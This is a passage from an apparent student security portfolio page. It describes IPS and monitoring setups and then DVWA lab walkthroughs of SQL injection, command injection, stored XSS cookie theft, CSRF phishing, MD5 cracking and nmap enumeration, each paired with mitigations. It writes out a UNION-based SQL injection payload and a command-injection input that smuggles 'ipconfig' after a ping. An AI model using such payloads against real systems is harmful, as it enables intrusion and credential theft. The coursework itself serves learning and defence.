          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
